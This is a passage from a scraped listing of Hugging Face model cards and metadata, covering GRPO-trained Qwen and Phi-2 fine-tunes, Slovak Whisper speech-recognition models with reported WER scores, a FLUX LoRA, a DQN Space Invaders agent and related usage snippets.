| 1.0463 | 14.7651 | 2200 | 0.2679 | 0.0750 |
| 1.0518 | 15.4362 | 2300 | 0.2666 | 0.0742 |
### Framework versions
- Transformers 4.53.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.0
|
dsaedi/ESGF-Llama-3.1-8B-Instruct-V0.26
|
dsaedi
| 2025-09-23T15:06:36Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:06:25Z |
---
base_model: unsloth/meta-llama-3.1-8b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** dsaedi
- **License:** apache-2.0
- **Finetuned from model :** unsloth/meta-llama-3.1-8b-instruct-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
alesiaivanova/Qwen-3b-GRPO-dag-5-sub-v2
|
alesiaivanova
| 2025-09-23T15:06:12Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"grpo",
"trl",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:04:47Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-5-sub-v2
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-5-sub-v2
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/v0y3bkqh)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
alesiaivanova/Qwen-3b-GRPO-dag-4-sub-v5
|
alesiaivanova
| 2025-09-23T15:04:45Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"grpo",
"trl",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:03:21Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-4-sub-v5
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-4-sub-v5
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/hhkrxv0p)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
alesiaivanova/Qwen-3b-GRPO-dag-4-sub-v4
|
alesiaivanova
| 2025-09-23T15:03:19Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"grpo",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:01:56Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-4-sub-v4
tags:
- generated_from_trainer
- trl
- grpo
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-4-sub-v4
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/jkgv56zg)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
alesiaivanova/Qwen-3b-GRPO-dag-4-sub-v3
|
alesiaivanova
| 2025-09-23T15:01:54Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"grpo",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:00:31Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-4-sub-v3
tags:
- generated_from_trainer
- trl
- grpo
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-4-sub-v3
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/1jn7f1hv)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
ryzax/1.5B-v82
|
ryzax
| 2025-09-23T15:01:42Z | 1 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"grpo",
"trl",
"conversational",
"arxiv:2402.03300",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-22T04:26:21Z |
---
library_name: transformers
model_name: 1.5B-v82
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for 1.5B-v82
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="ryzax/1.5B-v82", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/muennighoff/s2/runs/roh89jpg)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.24.0.dev0
- Transformers: 4.56.1
- Pytorch: 2.9.0.dev20250827+cu128
- Datasets: 4.0.0
- Tokenizers: 0.22.0
## Citations
Cite GRPO as:
```bibtex
@article{shao2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
hayangSKEL/blockassist
|
hayangSKEL
| 2025-09-23T14:59:36Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"whistling alert shrew",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-12T11:24:41Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- whistling alert shrew
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
dommmm01/SLAXYNI
|
dommmm01
| 2025-09-23T14:59:24Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:59:24Z |
---
license: apache-2.0
---
|
patrickamadeus/nanoVLM-230M-8k-ft-coco-caption-instruct-800
|
patrickamadeus
| 2025-09-23T14:59:21Z | 0 | 0 |
nanovlm
|
[
"nanovlm",
"safetensors",
"vision-language",
"multimodal",
"research",
"image-text-to-text",
"license:mit",
"region:us"
] |
image-text-to-text
| 2025-09-23T14:58:45Z |
---
# For reference on model card metadata, see the spec: https://github.com/huggingface/hub-docs/blob/main/modelcard.md?plain=1
# Doc / guide: https://huggingface.co/docs/hub/model-cards
library_name: nanovlm
license: mit
pipeline_tag: image-text-to-text
tags:
- vision-language
- multimodal
- research
---
**nanoVLM** is a minimal and lightweight Vision-Language Model (VLM) designed for efficient training and experimentation. Built using pure PyTorch, the entire model architecture and training logic fits within ~750 lines of code. It combines a ViT-based image encoder (SigLIP-B/16-224-85M) with a lightweight causal language model (SmolLM2-135M), resulting in a compact 222M parameter model.
For more information, check out the base model on https://huggingface.co/lusxvr/nanoVLM-222M.
**Usage:**
Clone the nanoVLM repository: https://github.com/huggingface/nanoVLM.
Follow the install instructions and run the following code:
```python
from models.vision_language_model import VisionLanguageModel
model = VisionLanguageModel.from_pretrained("patrickamadeus/nanoVLM-230M-8k-ft-coco-caption-instruct-800")
```
|
erikbozik/whisper-small-sk
|
erikbozik
| 2025-09-23T14:56:52Z | 9 | 0 | null |
[
"safetensors",
"whisper",
"speech",
"asr",
"slovak",
"parliament",
"legal",
"politics",
"sk",
"dataset:erikbozik/slovak-plenary-asr-corpus",
"base_model:openai/whisper-small",
"base_model:finetune:openai/whisper-small",
"license:mit",
"model-index",
"region:us"
] | null | 2025-06-18T12:38:35Z |
---
language:
- sk
tags:
- speech
- asr
- whisper
- slovak
- parliament
- legal
- politics
base_model: openai/whisper-small
datasets:
- erikbozik/slovak-plenary-asr-corpus
metrics:
- wer
model-index:
- name: whisper-small-sk
results:
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: Common Voice 21 (Slovak test set)
type: common_voice
metrics:
- name: WER
type: wer
value: 25.7
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: FLEURS (Slovak test set)
type: fleurs
metrics:
- name: WER
type: wer
value: 10.6
license: mit
---
# Whisper Small — Fine-tuned on Slovak Plenary ASR Corpus
This model is a fine-tuned version of [`openai/whisper-small`](https://huggingface.co/openai/whisper-small).
It is adapted for **Slovak ASR** using the [Slovak Plenary ASR Corpus](https://huggingface.co/datasets/erikbozik/slovak-plenary-asr-corpus): **2,806 hours** of aligned, ≤30 s speech–text pairs from official plenary sessions of the **Slovak National Council**.
- **Language:** Slovak
- **Domain:** Parliamentary / formal speech
- **Training data:** 2,806 h
- **Intended use:** Slovak speech recognition; strongest in formal/public-speaking contexts
## 🧪 Evaluation
| Dataset | Base WER | Fine-tuned WER | Δ (abs) |
|---|---:|---:|---:|
| Common Voice 21 (sk) | 58.4 | **25.7** | -32.7 |
| FLEURS (sk) | 36.1 | **10.6** | -25.5 |
*Numbers from the paper’s final benchmark runs.*
## 🔧 Training Details
- **Framework:** Hugging Face Transformers
- **Hardware:** NVIDIA A10 GPUs
- **Epochs:** up to 3 with early stopping on validation WER
- **Learning rate:** ~**40× smaller** than Whisper pretraining LR
## ⚠️ Limitations
- Domain bias toward parliamentary speech (e.g., political vocabulary, formal register).
- As with Whisper models generally, occasional hallucinations may appear; consider temperature fallback / compression-ratio checks at inference time (see the sketch below).
- Multilingual performance is not guaranteed (full-parameter finetuning emphasized Slovak).
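A minimal sketch of the suggested mitigation using the `transformers` long-form generation options (the audio path is a placeholder; the thresholds follow the defaults from the original Whisper setup):
```python
from transformers import pipeline

asr = pipeline("automatic-speech-recognition", model="erikbozik/whisper-small-sk")

# Temperature fallback with compression-ratio and log-prob checks; these
# generate kwargs take effect during long-form (>30 s) transcription.
result = asr(
    "sample.wav",  # placeholder path
    return_timestamps=True,
    generate_kwargs={
        "temperature": (0.0, 0.2, 0.4, 0.6, 0.8, 1.0),
        "compression_ratio_threshold": 1.35,
        "logprob_threshold": -1.0,
    },
)
print(result["text"])
```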
## 📄 Paper & Citation
Coming soon
## 🙏 Acknowledgements
This work was supported by [**VÚB Banka**](https://www.vub.sk), which provided the GPU resources and backing necessary to accomplish it, enabling progress in Slovak ASR research.
|
erikbozik/whisper-medium-sk
|
erikbozik
| 2025-09-23T14:56:28Z | 10 | 0 | null |
[
"safetensors",
"whisper",
"speech",
"asr",
"slovak",
"parliament",
"legal",
"politics",
"sk",
"dataset:erikbozik/slovak-plenary-asr-corpus",
"base_model:openai/whisper-medium",
"base_model:finetune:openai/whisper-medium",
"license:mit",
"model-index",
"region:us"
] | null | 2025-06-18T13:34:27Z |
---
language:
- sk
tags:
- speech
- asr
- whisper
- slovak
- parliament
- legal
- politics
base_model: openai/whisper-medium
datasets:
- erikbozik/slovak-plenary-asr-corpus
metrics:
- wer
model-index:
- name: whisper-medium-sk
results:
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: Common Voice 21 (Slovak test set)
type: common_voice
metrics:
- name: WER
type: wer
value: 18
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: FLEURS (Slovak test set)
type: fleurs
metrics:
- name: WER
type: wer
value: 7.6
license: mit
---
# Whisper Medium — Fine-tuned on Slovak Plenary ASR Corpus
This model is a fine-tuned version of [`openai/whisper-medium`](https://huggingface.co/openai/whisper-medium).
It is adapted for **Slovak ASR** using the [Slovak Plenary ASR Corpus](https://huggingface.co/datasets/erikbozik/slovak-plenary-asr-corpus): **2,806 hours** of aligned, ≤30 s speech–text pairs from official plenary sessions of the **Slovak National Council**.
- **Language:** Slovak
- **Domain:** Parliamentary / formal speech
- **Training data:** 2,806 h
- **Intended use:** Slovak speech recognition; strongest in formal/public-speaking contexts
## 🧪 Evaluation
| Dataset | Base WER | Fine-tuned WER | Δ (abs) |
|---|---:|---:|---:|
| Common Voice 21 (sk) | 38.0 | **18.0** | -20.0 |
| FLEURS (sk) | 18.7 | **7.6** | -11.1 |
*Numbers from the paper’s final benchmark runs.*
## 🔧 Training Details
- **Framework:** Hugging Face Transformers
- **Hardware:** NVIDIA A10 GPUs
- **Epochs:** up to 3 with early stopping on validation WER
- **Learning rate:** ~**40× smaller** than Whisper pretraining LR
## ⚠️ Limitations
- Domain bias toward parliamentary speech (e.g., political vocabulary, formal register).
- As with Whisper models generally, occasional hallucinations may appear; consider temperature fallback / compression-ratio checks at inference time.
- Multilingual performance is not guaranteed (full-parameter finetuning emphasized Slovak).
## 📄 Paper & Citation
Coming soon
## 🙏 Acknowledgements
This work was supported by [**VÚB Banka**](https://www.vub.sk), which provided the GPU resources and backing necessary to accomplish it, enabling progress in Slovak ASR research.
|
erikbozik/whisper-large-v3-turbo-sk
|
erikbozik
| 2025-09-23T14:56:01Z | 22 | 0 | null |
[
"safetensors",
"whisper",
"speech",
"asr",
"slovak",
"parliament",
"legal",
"politics",
"sk",
"dataset:erikbozik/slovak-plenary-asr-corpus",
"base_model:openai/whisper-large-v3-turbo",
"base_model:finetune:openai/whisper-large-v3-turbo",
"license:mit",
"model-index",
"region:us"
] | null | 2025-09-09T09:08:34Z |
---
language:
- sk
tags:
- speech
- asr
- whisper
- slovak
- parliament
- legal
- politics
base_model: openai/whisper-large-v3-turbo
datasets:
- erikbozik/slovak-plenary-asr-corpus
metrics:
- wer
model-index:
- name: whisper-large-v3-turbo-slovak-parliament
results:
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: Common Voice 21 (Slovak test set)
type: common_voice
metrics:
- name: WER
type: wer
value: 13.2
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: FLEURS (Slovak test set)
type: fleurs
metrics:
- name: WER
type: wer
value: 6.4
license: mit
---
# Whisper Large-v3 Turbo — Fine-tuned on Slovak Parliamentary ASR Corpus
This model is a fine-tuned version of [`openai/whisper-large-v3-turbo`](https://huggingface.co/openai/whisper-large-v3-turbo).
It is adapted for **Slovak ASR** using the [Slovak Parliamentary ASR Corpus](https://huggingface.co/datasets/erikbozik/slovak-parliamentary-asr-corpus): **2,806 hours** of aligned, ≤30 s speech–text pairs from official plenary sessions of the **Slovak National Council**.
- **Language:** Slovak
- **Domain:** Parliamentary / formal speech
- **Training data:** 2,806 h
- **Intended use:** Slovak speech recognition; strongest in formal/public-speaking contexts
## 🧪 Evaluation
| Dataset | Base WER | Fine-tuned WER | Δ (abs) |
|---|---:|---:|---:|
| Common Voice 21 (sk) | 31.7 | **13.2** | -18.5 |
| FLEURS (sk) | 10.7 | **6.4** | -4.3 |
*Numbers from the paper’s final benchmark runs.*
## 🔧 Training Details
- **Framework:** Hugging Face Transformers
- **Hardware:** NVIDIA A10 GPUs
- **Epochs:** up to 3 with early stopping on validation WER
- **Learning rate:** ~**40× smaller** than Whisper pretraining LR
## ⚠️ Limitations
- Domain bias toward parliamentary speech (e.g., political vocabulary, formal register).
- As with Whisper models generally, occasional hallucinations may appear; consider temperature fallback / compression-ratio checks at inference time.
- Multilingual performance is not guaranteed (full-parameter finetuning emphasized Slovak).
## 📄 Paper & Citation
Coming soon
## 🙏 Acknowledgements
This work was supported by [**VÚB Banka**](https://www.vub.sk), which provided the GPU resources and backing necessary to accomplish it, enabling progress in Slovak ASR research.
|
wonderxxx/blockassist
|
wonderxxx
| 2025-09-23T14:55:08Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"lazy peckish alligator",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-21T10:09:15Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- lazy peckish alligator
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
SoloWayG/Molecule_transformer
|
SoloWayG
| 2025-09-23T14:54:39Z | 0 | 1 | null |
[
"license:bsd-3-clause",
"region:us"
] | null | 2025-06-17T08:47:36Z |
---
license: bsd-3-clause
---
|
Simar28/dqn-SpaceInvadersNoFrameskip-v4
|
Simar28
| 2025-09-23T14:53:14Z | 0 | 0 |
stable-baselines3
|
[
"stable-baselines3",
"SpaceInvadersNoFrameskip-v4",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] |
reinforcement-learning
| 2025-09-23T14:52:45Z |
---
library_name: stable-baselines3
tags:
- SpaceInvadersNoFrameskip-v4
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: DQN
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: SpaceInvadersNoFrameskip-v4
type: SpaceInvadersNoFrameskip-v4
metrics:
- type: mean_reward
value: 713.00 +/- 147.87
name: mean_reward
verified: false
---
# **DQN** Agent playing **SpaceInvadersNoFrameskip-v4**
This is a trained model of a **DQN** agent playing **SpaceInvadersNoFrameskip-v4**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3)
and the [RL Zoo](https://github.com/DLR-RM/rl-baselines3-zoo).
The RL Zoo is a training framework for Stable Baselines3
reinforcement learning agents,
with hyperparameter optimization and pre-trained agents included.
## Usage (with SB3 RL Zoo)
RL Zoo: https://github.com/DLR-RM/rl-baselines3-zoo<br/>
SB3: https://github.com/DLR-RM/stable-baselines3<br/>
SB3 Contrib: https://github.com/Stable-Baselines-Team/stable-baselines3-contrib
SBX (SB3 + Jax): https://github.com/araffin/sbx
Install the RL Zoo (with SB3 and SB3-Contrib):
```bash
pip install rl_zoo3
```
```
# Download model and save it into the logs/ folder
python -m rl_zoo3.load_from_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -orga Simar28 -f logs/
python -m rl_zoo3.enjoy --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
```
If you installed the RL Zoo3 via pip (`pip install rl_zoo3`), from anywhere you can do:
```
python -m rl_zoo3.load_from_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -orga Simar28 -f logs/
python -m rl_zoo3.enjoy --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
```
## Training (with the RL Zoo)
```
python -m rl_zoo3.train --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
# Upload the model and generate video (when possible)
python -m rl_zoo3.push_to_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/ -orga Simar28
```
## Hyperparameters
```python
OrderedDict([('batch_size', 32),
('buffer_size', 100000),
('env_wrapper',
['stable_baselines3.common.atari_wrappers.AtariWrapper']),
('exploration_final_eps', 0.01),
('exploration_fraction', 0.1),
('frame_stack', 4),
('gradient_steps', 1),
('learning_rate', 0.0001),
('learning_starts', 100000),
('n_timesteps', 1000000.0),
('optimize_memory_usage', False),
('policy', 'CnnPolicy'),
('target_update_interval', 1000),
('train_freq', 4),
('normalize', False)])
```
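These settings correspond to the following SB3 constructor call; a sketch assuming the Atari extras (`ale-py`) are installed, with the `AtariWrapper` and 4-frame stacking from the table omitted for brevity:
```python
from stable_baselines3 import DQN

model = DQN(
    "CnnPolicy",
    "SpaceInvadersNoFrameskip-v4",  # resolved via gym.make; needs ale-py
    buffer_size=100_000,
    learning_rate=1e-4,
    batch_size=32,
    learning_starts=100_000,
    target_update_interval=1000,
    train_freq=4,
    gradient_steps=1,
    exploration_fraction=0.1,
    exploration_final_eps=0.01,
)
model.learn(total_timesteps=1_000_000)
```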
# Environment Arguments
```python
{'render_mode': 'rgb_array'}
```
|
eserder/thibaut_ia_1
|
eserder
| 2025-09-23T14:52:22Z | 0 | 0 |
diffusers
|
[
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] |
text-to-image
| 2025-09-23T14:22:16Z |
---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: eserder
---
# Thibaut_Ia_1
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `eserder` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "eserder",
"lora_weights": "https://huggingface.co/eserder/thibaut_ia_1/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('eserder/thibaut_ia_1', weight_name='lora.safetensors')
image = pipeline('eserder').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## Training details
- Steps: 2000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/eserder/thibaut_ia_1/discussions) to add images that show off what you’ve made with this LoRA.
|
SaketR1/bias-grpo-custom-rm-10000q-5e
|
SaketR1
| 2025-09-23T14:51:25Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"generated_from_trainer",
"grpo",
"trl",
"arxiv:2402.03300",
"base_model:microsoft/phi-2",
"base_model:finetune:microsoft/phi-2",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T13:55:31Z |
---
base_model: microsoft/phi-2
library_name: transformers
model_name: bias-grpo-custom-rm-10000q-5e
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for bias-grpo-custom-rm-10000q-5e
This model is a fine-tuned version of [microsoft/phi-2](https://huggingface.co/microsoft/phi-2).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="SaketR1/bias-grpo-custom-rm-10000q-5e", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/saketr1-uiuc/huggingface/runs/7vnd4fmq)
